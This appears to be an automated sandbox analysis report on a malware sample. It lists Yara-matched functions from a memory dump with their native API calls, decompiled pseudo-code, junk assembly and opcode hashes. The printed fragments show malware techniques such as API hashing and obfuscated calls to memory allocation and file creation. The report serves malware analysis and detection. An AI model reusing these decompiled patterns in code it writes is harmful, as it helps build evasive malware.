                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: wKA
                                  • API String ID: 823142352-3165208591
                                  • Opcode ID: aa2e372d16a216e1a790e9c4bdf35330398a213de013c03327491d0962fab78d
                                  • Instruction ID: 4afd77b747acf5b5c95aa5f1665348eba6ffc6453c8dc3a9f136bb3a8bb343d0
                                  • Opcode Fuzzy Hash: aa2e372d16a216e1a790e9c4bdf35330398a213de013c03327491d0962fab78d
                                  • Instruction Fuzzy Hash: 9E01E8B2200508AFCB18DF98DC95EDB77AAFF8C754F118659FA1D97240C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: wKA
                                  • API String ID: 823142352-3165208591
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                  • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                  • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                  • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419F2D, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00419F2D(void* __ebx, signed int __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				signed int _v117;
				long _t16;
				void* _t26;

				_v117 = _v117 | __edx;
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E0041A950(_t26, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}






                                  0x00419f2f
                                  0x00419f33
                                  0x00419f3f
                                  0x00419f47
                                  0x00419f69
                                  0x00419f6d

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 858d8ab863f1e1ad308eac448e9d7a9eddde1b8dc3804591941fcc246853f179
                                  • Instruction ID: b00c71b828885dc6a9c4465762eeb29b076ab44201cfba4c4d1e4c2f359be21c
                                  • Opcode Fuzzy Hash: 858d8ab863f1e1ad308eac448e9d7a9eddde1b8dc3804591941fcc246853f179
                                  • Instruction Fuzzy Hash: 92F0F8B1210208AFCB18DF99CC91EEB77ADAF88354F118559BA19A7251C631E811CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                  0x00419f3f
                                  0x00419f47
                                  0x00419f69
                                  0x00419f6d

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00419E7A(void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				long _t9;
				void* _t16;

				asm("sbb esi, [ebx]");
				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x40a913
				E0041A950(_t16, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                  0x00419e7b
                                  0x00419e83
                                  0x00419e86
                                  0x00419e8f
                                  0x00419e97
                                  0x00419ea5
                                  0x00419ea9

                                  APIs
                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: d2d2a761dcf187d18d314f5f1b47fc7e8a19f3b782eedd61401ceda2748be3b7
                                  • Instruction ID: cb64cfc0f1a723e84020248d5c05ad5cb27ad0bb46e88afc4a64298daebd7fa6
                                  • Opcode Fuzzy Hash: d2d2a761dcf187d18d314f5f1b47fc7e8a19f3b782eedd61401ceda2748be3b7
                                  • Instruction Fuzzy Hash: 32E04F766001106FDB10DBB5CC95EE77B28EF49350F154599F958AB242C531A504C690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                  0x00419e83
                                  0x00419e86
                                  0x00419e8f
                                  0x00419e97
                                  0x00419ea5
                                  0x00419ea9

                                  APIs
                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                                  • Instruction ID: e0d7bd5a6bfadb0fcf8a9769120b48ce2fc73b95c2fcb489c00796d59b3111b5
                                  • Opcode Fuzzy Hash: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                                  • Instruction Fuzzy Hash: 159002A134100442D10061994418B160045E7E2381F51C115E6058664DC659CD6A7166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                                  • Instruction ID: c0a67213e876ddc94ff44a26181adf9b9571e8130a3221a5a2f75721572d34a8
                                  • Opcode Fuzzy Hash: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                                  • Instruction Fuzzy Hash: 639002B120100402D140719944087560045A7D1381F51C111AA058664EC6998EED76A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                                  • Instruction ID: f827235518f72a7f2a7cd8b4585fce2c55a9ab870967542bb86f9271b82ec0f8
                                  • Opcode Fuzzy Hash: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                                  • Instruction Fuzzy Hash: D190026160100502D10171994408626004AA7D13C1F91C122A6018665ECA658AAAB171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                                  • Instruction ID: bef7ba3e9815b109828608e67f244e5e57fe8e431f3f91bcd85f29a57f8d1435
                                  • Opcode Fuzzy Hash: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                                  • Instruction Fuzzy Hash: 6D900261242041525545B19944085174046B7E13C1791C112A6408A60CC566996EE661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                                  • Instruction ID: 59582e93a4f2b8ff026664278bfab83939b668397f0134720f2fac7466491af9
                                  • Opcode Fuzzy Hash: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                                  • Instruction Fuzzy Hash: 6C90027120100413D111619945087170049A7D13C1F91C512A5418668DD6968A6AB161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                                  • Instruction ID: 8a269b114d62fb0afead7509322cc703d795562e47fcffdeafc1662ae4cfec49
                                  • Opcode Fuzzy Hash: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                                  • Instruction Fuzzy Hash: 8E90027120140402D1006199481871B0045A7D1382F51C111A6158665DC665896975B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                                  • Instruction ID: 88d89b5a93e372a4e84e2193eb4505eed67cfb02ded18c74ccfbf1a2d44d1a42
                                  • Opcode Fuzzy Hash: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                                  • Instruction Fuzzy Hash: CF90026160100042414071A988489164045BBE2391751C221A598C660DC599897D66A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
                                  • Instruction ID: 98dc01b99683be868e95991aceaca76167560267beff6c61491cc8353f788467
                                  • Opcode Fuzzy Hash: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
                                  • Instruction Fuzzy Hash: D690026121180042D20065A94C18B170045A7D1383F51C215A5148664CC95589796561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                                  • Instruction ID: a26870dda83c28240fed10a6da1ad643e0199de0f08acfcde9f39b61c7925acb
                                  • Opcode Fuzzy Hash: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                                  • Instruction Fuzzy Hash: 869002A120200003410571994418626404AA7E1381B51C121E60086A0DC56589A97165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                                  • Instruction ID: 25d3dc18543222bc226cfe4ad701c217de339c281b13f7a78db9e78f92bf21e0
                                  • Opcode Fuzzy Hash: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                                  • Instruction Fuzzy Hash: B9900265211000030105A59907085170086A7D63D1351C121F6009660CD66189796161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                                  • Instruction ID: 8bae8b49cea459c22722bfb571b02aa536d9146785cf1ec7446fd74d5bb2cfac
                                  • Opcode Fuzzy Hash: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                                  • Instruction Fuzzy Hash: 7290026921300002D1807199540C61A0045A7D2382F91D515A5009668CC955897D6361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                                  • Instruction ID: be3ce218bbf776591d00267c21f068cd6729aac63d2bcb0d7a527258008e5d6e
                                  • Opcode Fuzzy Hash: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                                  • Instruction Fuzzy Hash: B690026130100003D1407199541C6164045F7E2381F51D111E5408664CD955896E6262
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                                  • Instruction ID: 4fcf1ab5422ba200f23f3f4c5d2b7e2de0ea2edc15f0f70b43ab4f30021315b9
                                  • Opcode Fuzzy Hash: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                                  • Instruction Fuzzy Hash: 2990027120100402D10065D9540C6560045A7E1381F51D111AA018665EC6A589A97171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                                  • Instruction ID: 6e55cf9ecf6c0dd0d2ca79c131fd3c9bd80e851aee30bf829a01120951751849
                                  • Opcode Fuzzy Hash: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                                  • Instruction Fuzzy Hash: 1590027120108802D1106199840875A0045A7D1381F55C511A9418768DC6D589A97161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                                  • Instruction ID: fe93457a4fcad1289ec6382bf934db5aea854220ef0c0c432154f865c6ada710
                                  • Opcode Fuzzy Hash: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                                  • Instruction Fuzzy Hash: D190027120100802D1807199440865A0045A7D2381F91C115A5019764DCA558B6D77E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                  • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                  • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                  • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408286, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00408286(void* __eax, void* __ebx, void* __eflags, intOrPtr* _a4, long _a12) {
				void* __esi;
				int _t8;
				void* _t18;
				void* _t20;
				long _t22;
				void* _t24;
				int _t25;
				void* _t27;

				0x7fae19f5();
				if(__eflags > 0) {
					_push(_t27);
					asm("rcl byte [edx-0x7d], 0xc6");
					asm("sbb al, 0x56"); // executed
					E0040ACC0(); // executed
					_t8 = E00414E10(_t24, __ebx, 0, 0, 0xc4e7b6d6);
					_t25 = _t8;
					__eflags = _t25;
					if(_t25 != 0) {
						_t22 = _a12;
						_t8 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
						__eflags = _t8;
						if(__eflags == 0) {
							_t8 =  *_t25(_t22, 0x8003, _t27 + (E0040A450(__eflags, 1, 8) & 0x000000ff) - 0x40, _t8);
						}
					}
					return _t8;
				} else {
					asm("adc byte [ebp-0x75], 0xec");
					_push(_t27);
					_t20 = E0041B160(_t18);
					if(_t20 == 0 || _t20 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a4 + _t20;
					}
				}
			}











                                  0x00408287
                                  0x0040828c
                                  0x00408317
                                  0x00408318
                                  0x0040831c
                                  0x0040831e
                                  0x0040832e
                                  0x00408333
                                  0x00408338
                                  0x0040833a
                                  0x0040833d
                                  0x0040834a
                                  0x0040834c
                                  0x0040834e
                                  0x0040836b
                                  0x0040836b
                                  0x0040836d
                                  0x00408372
                                  0x0040828f
                                  0x0040828f
                                  0x00408290
                                  0x00408298
                                  0x0040829c
                                  0x004082af
                                  0x004082b2
                                  0x004082a6
                                  0x004082ae
                                  0x004082ae
                                  0x0040829c

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 3333
                                  • API String ID: 1836367815-2924271548
                                  • Opcode ID: f3badf50578ce9ca8ce948d1da6c5dee2300726f84e556e8052460cf00dc0e24
                                  • Instruction ID: 2aafc0e0c50240cc4be676c4595c3ee4b597918a6ed0d1e9c7cd7858e8fea17c
                                  • Opcode Fuzzy Hash: f3badf50578ce9ca8ce948d1da6c5dee2300726f84e556e8052460cf00dc0e24
                                  • Instruction Fuzzy Hash: A40124317407193AEB2466685D42F7E62489F81F20F08417FFE88FA2C1DEBDA81102DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                  0x0041a037
                                  0x0041a03c
                                  0x0041a04d
                                  0x0041a051

                                  APIs
                                  • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: oLA
                                  • API String ID: 1279760036-3789366272
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 61threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 42%
                                  			E004082E8(intOrPtr* __ebx, void* __esi, long _a8) {
				char _v63;
				char _v64;
				long __edi;
				void* _t9;

				asm("in al, dx");
				 *__ebx =  *__ebx + __esi;
				if( *__ebx > 0) {
					return _t9;
				} else {
					__esi = __esi + 1;
					asm("adc [ebp-0x75], dl");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x40;
					_push(__esi);
					__eax =  &_v63;
					_v64 = 0;
					E0041B850( &_v63, 0, 0x3f) = E0041C3F0( &_v64, 3);
					__esi = _a8;
					_push(__ebp);
					asm("rcl byte [edx-0x7d], 0xc6");
					asm("sbb al, 0x56"); // executed
					E0040ACC0(); // executed
					__eax = E00414E10(__esi, __eax, 0, 0, 0xc4e7b6d6);
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						_push(__edi);
						__edi = _a8;
						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = E0040A450(__eflags, 1, 8);
							__eax = __al & 0x000000ff;
							__eax =  *__esi(__edi, 0x8003, __ebp + (__al & 0x000000ff) - 0x40, __eax);
						}
						_pop(__edi);
					}
					_pop(__esi);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}







                                  0x004082e9
                                  0x004082ea
                                  0x004082ec
                                  0x0040827e
                                  0x004082ee
                                  0x004082ee
                                  0x004082ef
                                  0x004082f0
                                  0x004082f1
                                  0x004082f3
                                  0x004082f6
                                  0x004082f9
                                  0x004082ff
                                  0x0040830e
                                  0x00408313
                                  0x00408317
                                  0x00408318
                                  0x0040831c
                                  0x0040831e
                                  0x0040832e
                                  0x00408333
                                  0x00408338
                                  0x0040833a
                                  0x0040833c
                                  0x0040833d
                                  0x0040834a
                                  0x0040834c
                                  0x0040834e
                                  0x00408355
                                  0x0040835a
                                  0x0040836b
                                  0x0040836b
                                  0x0040836d
